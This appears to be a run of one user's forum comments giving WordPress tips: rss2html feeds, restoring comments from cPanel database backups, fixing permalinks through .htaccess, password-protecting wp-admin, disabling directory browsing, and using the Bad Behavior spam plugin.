You don’t need to go ahead and fiddle with PHP if you’re not comfortable with it. Another option is to usee rss2html which will allow you to return, say 3, RSS items from your blog and have the output added to your page as HTML.

I’ve done this on mymacbookpro as it shows the 5 most recent stories from my tech and VoIP blogs. Is that something that you’re wanting to get done?

I guess could hack the code a little so that it allows users to register but it sends them a random password to their email address. Should be simple to implement that and checking for the presence of a certain domain only.

Been there done that! I’m guessing that you’ve not got a backup of your WordPress database? Depend on when the comments were made you might actually find that your host has (via cPanel) a daily MySQL database backup.

If you can get hold of that then you could selectively restore – would take a bit of SQL fiddling but can be done.

I too was unable to get permalinks working for pages but in the end I found out that I needed to regenerate the .htaccess file after creating a new page. Then things worked fine.

Assume y ou’ve tried to regenerate the .htaccess file after adding a page?

Why not prefix your permalinks with index.php as that works on most hosting providers. See the options on the permalink page in your blog install.

What I have done is to password protect the wp-admin folder as I don’t want people accessing that to try and logon to my site. (Did that through my cpanel)

You could change your .htaccess and add

Options All -Indexes

Which means that people won’t be able to browse folders on your website as they can now.

I often get a 500 error myself but it’s usually caused by my terrible host (www.mostic.com) but as you say the post does indeed go through fine.

Well done! So how long have you been with WordPress now? I switched over in November 2004 from blogger.com (and before that LiveJournal) and have been *very* happy.

So when I did my import I pulled in posts from both blogger.com and LiveJournal. Was actually all very easy!

Yip have had Bad Behavior up and running for about a week now. It’s helped a load with spam (combined with SK2) and looks like it has reduced my bandwidth usage as well.

Will implement the .htaccess stuff now.
